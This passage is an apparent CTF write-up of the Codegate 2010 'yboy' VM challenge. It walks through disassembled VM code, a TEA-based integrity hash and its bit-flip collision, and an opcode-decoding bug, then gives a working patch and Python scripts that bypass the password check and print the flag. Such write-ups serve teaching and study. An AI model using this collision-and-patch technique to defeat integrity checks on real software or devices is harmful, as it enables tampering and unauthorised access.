0088: r1 = set_imm 0, 75 ; u
0089: r0 = outputchar r1, r0
008a: r1 = set_imm 0, 70 ; p
008b: r0 = outputchar r1, r0
008c: r1 = set_imm 0, 20 ;
008d: r0 = outputchar r1, r0
008e: r1 = set_imm 0, 74 ; t
008f: r0 = outputchar r1, r0
0090: r1 = set_imm 0, 68 ; h
0091: r0 = outputchar r1, r0
0092: r1 = set_imm 0, 65 ; e
0093: r0 = outputchar r1, r0
0094: r1 = set_imm 0, 20 ;
0095: r0 = outputchar r1, r0
0096: r1 = set_imm 0, 67 ; g
0097: r0 = outputchar r1, r0
0098: r1 = set_imm 0, 6f ; o
0099: r0 = outputchar r1, r0
009a: r1 = set_imm 0, 6f ; o
009b: r0 = outputchar r1, r0
009c: r1 = set_imm 0, 64 ; d
009d: r0 = outputchar r1, r0
009e: r1 = set_imm 0, 20 ;
009f: r0 = outputchar r1, r0
00a0: r1 = set_imm 0, 77 ; w
00a1: r0 = outputchar r1, r0
00a2: r1 = set_imm 0, 6f ; o
00a3: r0 = outputchar r1, r0
00a4: r1 = set_imm 0, 72 ; r
00a5: r0 = outputchar r1, r0
00a6: r1 = set_imm 0, 6b ; k
00a7: r0 = outputchar r1, r0
00a8: r1 = set_imm 0, 2e ; .
00a9: r0 = outputchar r1, r0
00aa: r1 = set_imm 0, 20 ;
00ab: r0 = outputchar r1, r0
00ac: r1 = set_imm 0, 53 ; S
00ad: r0 = outputchar r1, r0
00ae: r1 = set_imm 0, 74 ; t
00af: r0 = outputchar r1, r0
00b0: r1 = set_imm 0, 61 ; a
00b1: r0 = outputchar r1, r0
00b2: r1 = set_imm 0, 79 ; y
00b3: r0 = outputchar r1, r0
00b4: r1 = set_imm 0, 20 ;
00b5: r0 = outputchar r1, r0
00b6: r1 = set_imm 0, 73 ; s
00b7: r0 = outputchar r1, r0
00b8: r1 = set_imm 0, 68 ; h
00b9: r0 = outputchar r1, r0
00ba: r1 = set_imm 0, 61 ; a
00bb: r0 = outputchar r1, r0
00bc: r1 = set_imm 0, 72 ; r
00bd: r0 = outputchar r1, r0
00be: r1 = set_imm 0, 70 ; p
00bf: r0 = outputchar r1, r0
00c0: r1 = set_imm 0, 2e ; .
00c1: r0 = outputchar r1, r0
00c2: r1 = set_imm 0, 20 ;
00c3: r0 = outputchar r1, r0
00c4: r1 = set_imm 0, 44 ; D
00c5: r0 = outputchar r1, r0
00c6: r1 = set_imm 0, 69 ; i
00c7: r0 = outputchar r1, r0
00c8: r1 = set_imm 0, 73 ; s
00c9: r0 = outputchar r1, r0
00ca: r1 = set_imm 0, 6f ; o
00cb: r0 = outputchar r1, r0
00cc: r1 = set_imm 0, 62 ; b
00cd: r0 = outputchar r1, r0
00ce: r1 = set_imm 0, 65 ; e
00cf: r0 = outputchar r1, r0
00d0: r1 = set_imm 0, 79 ; y
00d1: r0 = outputchar r1, r0
00d2: r1 = set_imm 0, 20 ;
00d3: r0 = outputchar r1, r0
00d4: r1 = set_imm 0, 6d ; m
00d5: r0 = outputchar r1, r0
00d6: r1 = set_imm 0, 69 ; i
00d7: r0 = outputchar r1, r0
00d8: r1 = set_imm 0, 73 ; s
00d9: r0 = outputchar r1, r0
00da: r1 = set_imm 0, 69 ; i
00db: r0 = outputchar r1, r0
00dc: r1 = set_imm 0, 6e ; n
00dd: r0 = outputchar r1, r0
00de: r1 = set_imm 0, 66 ; f
00df: r0 = outputchar r1, r0
00e0: r1 = set_imm 0, 6f ; o
00e1: r0 = outputchar r1, r0
00e2: r1 = set_imm 0, 72 ; r
00e3: r0 = outputchar r1, r0
00e4: r1 = set_imm 0, 6d ; m
00e5: r0 = outputchar r1, r0
00e6: r1 = set_imm 0, 61 ; a
00e7: r0 = outputchar r1, r0
00e8: r1 = set_imm 0, 74 ; t
00e9: r0 = outputchar r1, r0
00ea: r1 = set_imm 0, 69 ; i
00eb: r0 = outputchar r1, r0
00ec: r1 = set_imm 0, 6f ; o
00ed: r0 = outputchar r1, r0
00ee: r1 = set_imm 0, 6e ; n
00ef: r0 = outputchar r1, r0
00f0: r1 = set_imm 0, 2e ; .
00f1: r0 = outputchar r1, r0
00f2: r1 = set_imm 0, a ;
00f3: r0 = outputchar r1, r0
00f4: r1 = set_imm 0, 59 ; Y
00f5: r0 = outputchar r1, r0
00f6: r1 = set_imm 0, 6f ; o
00f7: r0 = outputchar r1, r0
00f8: r1 = set_imm 0, 75 ; u
00f9: r0 = outputchar r1, r0
00fa: r1 = set_imm 0, 72 ; r
00fb: r0 = outputchar r1, r0
00fc: r1 = set_imm 0, 20 ;
00fd: r0 = outputchar r1, r0
00fe: r1 = set_imm 0, 66 ; f
00ff: r0 = outputchar r1, r0
0100: r1 = set_imm 0, 6c ; l
0101: r0 = outputchar r1, r0
0102: r1 = set_imm 0, 61 ; a
0103: r0 = outputchar r1, r0
0104: r1 = set_imm 0, 67 ; g
0105: r0 = outputchar r1, r0
0106: r1 = set_imm 0, 20 ;
0107: r0 = outputchar r1, r0
0108: r1 = set_imm 0, 69 ; i
0109: r0 = outputchar r1, r0
010a: r1 = set_imm 0, 73 ; s
010b: r0 = outputchar r1, r0
010c: r1 = set_imm 0, 3a ; :
010d: r0 = outputchar r1, r0
010e: r1 = set_imm 0, 20 ;
010f: r0 = outputchar r1, r0
0110: r29 = set_imm 0, 1 ;
0111: r30 = xor r30, r30
0112: r1 = load r30, r0
0113: r0 = outputchar r1, r0
0114: r30 = add r29, r30
0115: r31 = set_imm 0, 26 ; &
0116: r31 = sub r30, r31
0117: r32 = set_imm 1, 12 ; 0112
0118: r0 = branch r31, r32 ; if (r31) goto r32
0119: r1 = set_imm 0, a ;
011a: r0 = outputchar r1, r0
011b: r0 = halt r0, r0
Pseudo C code of the decompiled codefile
// data is an int array - int data[0x2000/4]
// the first 140 bytes of data store the content of "secret.key" file
printf("Enter password>>");
r4 = 1337;
while (!EOF) {
    r3 = getc();
    data[r4] = r3;
    if (r3 == '\n') break;
    r4++;
}
r19 = 1337;
r20 = 0;
while (1) {
    if (r20 == 0x23) goto correctpass;
    if (data[r20] != data[r19+r20]) goto wrongpass;
    r20++;
}
wrongpass:
    printf("Access Denied\n");
    exit(0);
correctpass:
    printf("Greetz hackers. Keep up the good work. Stay sharp. Disobey misinformation.\n");
    printf("Your flag is: ");
    for(i=0; i<0x26; i++)
        printf("%c", data[i]);
    printf("\n");
c. Xbox’s TEA hash collision
From the decompiled VM code above, if we could modify the content of codefile, it would be possible to print out the flag from secret.key, which is stored starting at data[0]. However, the codefile is protected against tampering by a hash check:
int
check_code()
{
    int result;
    unsigned int v1;
    unsigned int v2;
    unsigned int i;
    hash_block(0x99999999, 0xBBBBBBBB, 0x44444444, 0x55555555, code[0],
               code[1], &v2, &v1);
    for (i = 2; i <= 32766; i += 2)
        hash_block(v2, v1, v2, v1, code[i], code[i + 1], (int *) &v2,
                   (int *) &v1);
    if (v2 != 0x1EC0A9F0 || (result = v1, v1 != 0x9217F034)) {
        puts("Tampering detected. Prepare for imminent arrest.");
        exit(0);
    }
    return result;
}
Googling the constant 0x61C88647 and searching around, I found that it’s a TEA-based hash algorithm. Using TEA as a hash is a bad idea: there is a weakness in the algorithm whereby flipping the 32nd and 64th bits of a 64-bit block leaves the hash value unchanged. The Xbox was hacked because of this. (Actually, I didn’t know about the Xbox TEA bit-flipping attack. I found this collision by writing a tool that brute-forces bit flips in a 64-bit block to find a collision. Later, I realized that Yboy is Xbox with two bits flipped.)
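The property behind this collision can be reproduced with textbook TEA. The sketch below is not yboy's hash_block(), which is not shown in this post; it only assumes that the two code words end up as a key pair (k0, k1) or (k2, k3) of a TEA-style round. In each round a key word is only ever added to a shifted data word and the results are XORed, so flipping the top bit of both words of a pair flips the top bit of two XORed terms, and the flips cancel. The constant 0x61C88647 is the two's complement of TEA's delta 0x9E3779B9.

```python
MASK = 0xffffffff
DELTA = 0x9e3779b9   # (-DELTA) & MASK == 0x61c88647

def tea_encrypt(v0, v1, key, rounds=32):
    """Textbook TEA encryption of one 64-bit block with a 128-bit key."""
    k0, k1, k2, k3 = key
    total = 0
    for _ in range(rounds):
        total = (total + DELTA) & MASK
        v0 = (v0 + ((((v1 << 4) + k0) & MASK)
                    ^ ((v1 + total) & MASK)
                    ^ (((v1 >> 5) + k1) & MASK))) & MASK
        v1 = (v1 + ((((v0 << 4) + k2) & MASK)
                    ^ ((v0 + total) & MASK)
                    ^ (((v0 >> 5) + k3) & MASK))) & MASK
    return v0, v1

# Example values only: two VM instruction words used as the (k0, k1) pair.
key = (0x0c000a0b, 0x03043d04, 0x44444444, 0x55555555)
flipped = (key[0] ^ 0x80000000, key[1] ^ 0x80000000, key[2], key[3])

original_out = tea_encrypt(0x99999999, 0xbbbbbbbb, key)
flipped_out = tea_encrypt(0x99999999, 0xbbbbbbbb, flipped)
print(original_out == flipped_out)
```

The same cancellation holds for the (k2, k3) pair, so either half of the key has an equivalent twin.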
Now, the next problem is to find how codefile should be patched to print out the flag.
d. Branch instruction handling bug
The 32nd and 64th bits of a 64-bit block are the MSBs of the opcode fields of two consecutive instructions. Since the code only uses the lowest 5 bits of the opcode for instruction decoding, changing the MSB of the opcode doesn’t affect the decoding. However, there is a problem in the branch instruction handling code that lets us modify the behavior of a branch.
If we look at the VM parsing code, an instruction (4 bytes) is structured as follows
[ opcode ] [ output register ] [ imm1 ] [ imm2 ]
opcode = (ins >> 24); //& 0x1f;
reg = (ins >> 16) & 0xFF;
imm1 = (ins >> 8) & 0xFF;
imm2 = (unsigned char) ins;
The lowest 5 bits of the opcode are used as an index to look up the corresponding function in the decode function table (decode[opcode & 0x1f])
Let's look deeper at the code handling the ‘branch’ instruction:
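As a quick check of this field layout, here is a small Python decoder that mirrors the shifts and the table from the decompiler. The function name decode_word is made up for this sketch; the instruction words used in the example are the ones quoted later in the post.

```python
MNEMONICS = [
    "halt", "push", "pop", "add", "sub", "or", "xor", "nor", "shl",
    "shr", "not", "nop", "branch", "jumpreg", "callreg", "load",
    "store", "halt", "inputchar", "outputchar", "set_imm", "reload",
    "rrandom",
] + ["nop"] * 9

def decode_word(ins):
    """Split a 32-bit VM instruction into (opcode, mnemonic, reg, imm1, imm2)."""
    opcode = (ins >> 24) & 0xff
    reg = (ins >> 16) & 0xff
    imm1 = (ins >> 8) & 0xff
    imm2 = ins & 0xff
    # Only the low five bits select the handler, as in decode[opcode & 0x1f].
    return opcode, MNEMONICS[opcode & 0x1f], reg, imm1, imm2

for word in (0x0c000a0b, 0x8c000a0b, 0x03043d04):
    print("%08x -> %r" % (word, decode_word(word)))
```

Both 0x0c000a0b and 0x8c000a0b decode to a branch on r10 with target r11; only the raw opcode byte differs.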
int branch(int imm1, int imm2)
{
    if (imm1)
        PC = imm2;
    else
        PC++;
    return 0;
}
Inside main()
As we can see, it only uses the lowest five bits of the opcode ((ins >> 24) & 0x1f) for decoding, while the full byte (ins >> 24) is used for the comparison later (the opcode value for branch is 0xC).
If we set the MSB of the opcode, it becomes 0x8c. In this case the branch() function is still called; however, the (opcode == 0xC) check in main() is false, so PC is unexpectedly increased by 1.
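The effect on PC can be modelled in a few lines. This is a reconstruction from the description above, not code taken from the binary: it assumes the main loop increments PC after every instruction unless the full opcode byte equals 0xC. The name step_branch is made up for this sketch.

```python
BRANCH = 0x0c

def step_branch(pc, opcode, condition, target):
    """Return the next PC after a branch-class instruction (assumed model)."""
    # Dispatch uses only the low five bits, so 0x8c still reaches branch().
    if opcode & 0x1f == BRANCH:
        pc = target if condition else pc + 1    # what branch() does
    # The main loop compares the full opcode byte before skipping its own PC++.
    if opcode != BRANCH:
        pc += 1
    return pc

print(hex(step_branch(0x2a, 0x0c, 1, 0x2f)))   # normal taken branch
print(hex(step_branch(0x2a, 0x8c, 1, 0x2f)))   # patched taken branch
```

Under this model a taken branch with opcode 0x8c lands one instruction past its target, and a patched branch that is not taken would also skip the instruction that follows it.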
e. Subvert the code flow to print out the flag
Looking back at the decompiled VM code:
0020: r60 = set_imm 0, ff ; r60 = 255
0021: r61 = set_imm 0, 1 ; r61 = 1
0022: r4 = set_imm 5, 39 ; r4 = 0x539 (1337)
0023: r3 = inputchar r0, r0 ; r3 = getc()
0024: r50 = set_imm 0, a ; r50 = '\n'
0025: r0 = store r4, r3 ; data[r4] = r3
0026: r0 = nop r0, r0
0027: r10 = sub r3, r50 ; r10 = r3 - '\n'
0028: r10 = not r10, r0 ; !r10
0029: r11 = set_imm 0, 2f ; r11 = 0x002f
002a: r0 = branch r10, r11 ; if (r3 == '\n') goto 002f
002b: r4 = add r61, r4 ; r4++
002c: r10 = sub r60, r3 ; r10 = 255 - r3
002d: r11 = set_imm 0, 23 ; 0x0023
002e: r0 = branch r10, r11 ; if (r3 != EOF) goto 0023
002f: r19 = set_imm 5, 39 ; r19 = 0x539 (1337)
0030: r20 = set_imm 0, 0 ; r20 = 0
0031: r21 = set_imm 0, 23 ; r21 = 0x23 (35)
0032: r21 = sub r21, r20 ; r21 = r21 - r20
0033: r21 = not r21, r0 ; !r21
0034: r22 = set_imm 0, 5e ; 0x005e
0035: r0 = branch r21, r22 ; if (r20 == 35) goto 005e //goodpassword
0036: r21 = load r20, r0 ; r21 = data[r20]
0037: r25 = add r19, r20 ; r25 = 0x539 + r20
0038: r0 = nop r0, r0
0039: r26 = load r25, r0 ; r26 = data[0x539 + r20]
003a: r26 = sub r21, r26 ; r26 = r21 - r26
003b: r22 = set_imm 0, 41 ; 0x0041
003c: r0 = branch r26, r22 ; if (data[r20] != data[0x539+r20]) goto 0041 //badpassword
003d: r23 = set_imm 0, 1 ; r23 = 1
003e: r20 = add r20, r23 ; r20++
003f: r22 = set_imm 0, 31 ; 0x0031
0040: r0 = branch r22, r22 ; goto 0031 //loop
The code above reads the password from stdin, stores it inside the data array starting at data[0x539], then compares the input with the content of secret.key stored at the beginning of the data array, data[0] (35 DWORDs = 140 bytes).
What if we modify the MSB of the branch instruction at 002a?
//modify code[2a] from 0x0c000a0b to 0x8c000a0b
002a: r0 = branch r10, r11 ; if (r3 == '\n') goto 002f
When '\n' is read, the branch instruction sets PC to the password check code at 002f (002f: r19 = set_imm 5, 39 ; r19 = 0x539). However, because the opcode is now 0x8c instead of 0x0c, PC is also unexpectedly increased by 1 due to the main loop bug mentioned above. Hence PC points to the instruction at 0030 (0030: r20 = set_imm 0, 0 ; r20 = 0) instead of 002f.
Since the instruction at 002f is skipped, the r19 register is 0 (its default value) instead of 0x539. The VM code becomes
//r19 register value is 0 while it's expected to be 0x539
r20 = 0;
while (1) {
if (r20 == 0x23) goto correctpass;
if (data[r20] != data[r19+r20]) goto wrongpass;
r20++;
}
With r19 = 0 it compares the data with itself. Yboy pwned!
Exploit
- Copy the codefile and edit it to set the 32nd and 64th bits of the 64-bit block at instruction offset 0x2a
code[2a] 0x0c000a0b -> 0x8c000a0b
code[2b] 0x03043d04 -> 0x83043d04
- Run yboy with the new codefile
- Press enter and get the flag
hugh@codegate-desktop:/tmp/rd$ ./yboy newcodefile
...
Enter password>>
Greetz hackers. Keep up the good work. Stay sharp. Disobey misinformation.
Your flag is: TEA - Toiletpaper Esque Aspirations
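The edit from the first step can be scripted. This sketch assumes the codefile is an array of little-endian 32-bit words (yboy loads it straight into memory on x86), so the opcode byte of instruction i sits at file offset 4*i + 3. The function name and the file names in the usage note are examples only.

```python
import struct

def flip_opcode_msbs(codefile, index):
    """Return a copy with the opcode MSB flipped in instructions index and index + 1."""
    if index % 2:
        raise ValueError("index must be even so both words share one 64-bit hash block")
    patched = bytearray(codefile)
    for i in (index, index + 1):
        patched[4 * i + 3] ^= 0x80   # little-endian: byte 3 holds bits 24..31
    return bytes(patched)

# Synthetic stand-in for the codefile: zeros, then the two words at 0x2a and 0x2b.
original = struct.pack("<44I", *([0] * 0x2a + [0x0c000a0b, 0x03043d04]))
patched = flip_opcode_msbs(original, 0x2a)
words = struct.unpack("<44I", patched)
print("%08x %08x" % (words[0x2a], words[0x2b]))
```

With the real file, this would be `open("newcodefile", "wb").write(flip_opcode_msbs(open("codefile", "rb").read(), 0x2a))`.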
Keywords: TEA, VM, Xbox, codegate 2010


